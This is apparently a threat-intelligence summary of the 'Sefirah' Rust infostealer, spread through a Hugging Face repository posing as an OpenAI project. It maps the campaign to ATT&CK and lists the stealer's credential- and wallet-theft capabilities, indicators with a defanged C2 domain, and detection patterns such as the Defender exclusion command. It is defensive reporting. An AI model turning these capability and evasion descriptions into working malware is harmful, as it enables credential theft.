Full Report
A malicious Hugging Face repository that reached the platform's trending list impersonated OpenAI's "Privacy Filter" project to deliver information-stealing malware to Windows users. [...]
Analysis Summary
# Tool/Technique: Sefirah Infostealer (via Hugging Face Typosquatting)
## Overview
This attack involves the distribution of a Rust-based information-stealing malware (identified as "Sefirah") through a malicious Hugging Face repository. The campaign utilized typosquatting by impersonating a legitimate OpenAI project ("Privacy Filter") to trick developers and AI researchers into downloading and executing malicious code.
## Technical Details
- **Type:** Malware (Infostealer) and Delivery Technique (Typosquatting/Supply Chain Attack)
- **Platform:** Windows
- **Capabilities:** Credential theft, data exfiltration, anti-analysis, privilege escalation.
- **First Seen:** May 7, 2026 (Reported)
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell
- T1204.002 - User Execution: Malicious File
- **TA0005 - Defense Evasion**
- T1562.001 - Impair Defenses: Disable or Modify Tools (Microsoft Defender Exclusions)
- T1497 - Virtualization/Sandbox Evasion
- T1027 - Obfuscated Files or Information
- **TA0006 - Credential Access**
- T1555 - Credentials from Password Stores
- T1539 - Steal Web Session Cookie
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Browser Data Theft:** Targets Chromium and Gecko-based browsers to extract cookies, saved passwords, encryption keys, and session tokens.
- **Crypto-Asset Theft:** Scans for cryptocurrency wallet applications, browser extensions, and seed phrases/keys.
- **Communication Interception:** Steals Discord tokens, local databases, and master keys.
- **System Information Gathering:** Collects hardware details and captures multi-monitor screenshots.
- **Credential Harvesting:** Extracts SSH, FTP (FileZilla), and VPN configuration files.
### Advanced Features
- **Anti-Analysis:** Includes sophisticated checks to detect virtual machines (VMs), sandboxes, debuggers, and various malware analysis tools to prevent execution in lab environments.
- **Persistence & Evasion:** Automatically adds the payload to Microsoft Defender's exclusion list and executes PowerShell in invisible windows.
- **Reputation Manipulation:** The threat actors used auto-generated accounts to "star" or "like" the repository, artificially pushing it to the Hugging Face trending list to build false trust.
## Indicators of Compromise
- **File Names:**
- `loader.py` (Initial trigger)
- `start.bat` (Privilege escalation script)
- `sefirah` (Final Rust payload)
- **Network Indicators:**
- hxxp[://]recargapopular[.]com (C2 exfiltration domain)
- **Behavioral Indicators:**
- Python scripts disabling SSL verification.
- Base64 encoded URLs within Python scripts.
- Execution of PowerShell commands targeting Microsoft Defender exclusion lists.
## Associated Threat Actors
- **Unknown:** However, researchers noted tactical overlaps (infrastructure and code) with an npm typosquatting campaign previously distributing the **WinOS 4.0** implant.
## Detection Methods
- **Signature-based:** Monitoring for the specific "Sefirah" Rust binary and the `start.bat` logic that modifies Defender settings.
- **Behavioral detection:**
- Identifying Python processes that spawn PowerShell with "Add-MpPreference -ExclusionPath" arguments.
- Detection of unusual outbound traffic to `recargapopular[.]com`.
- Monitoring for unauthorized access to browser profile folders (AppData\Local\Google\Chrome\User Data) by non-browser processes.
## Mitigation Strategies
- **Prevention:** Verify the authenticity of Hugging Face repositories by checking the publisher's verified status and creation date.
- **Hardening:** Use Endpoint Detection and Response (EDR) tools to block unauthorized registry or policy changes to Windows Defender.
- **Security Policy:** Implement strict egress filtering to block communication with known malicious domains.
- **Response:** If compromised, users should reimage the host, rotate all stored credentials/SSH keys, and invalidate all active browser sessions.
## Related Tools/Techniques
- **WinOS 4.0:** An implant with overlapping infrastructure.
- **PyPI/npm Typosquatting:** Similar methodology used in other package manager ecosystems.
- **Model Card Impersonation:** A technique where malicious actors copy the documentation of legitimate AI projects to deceive users.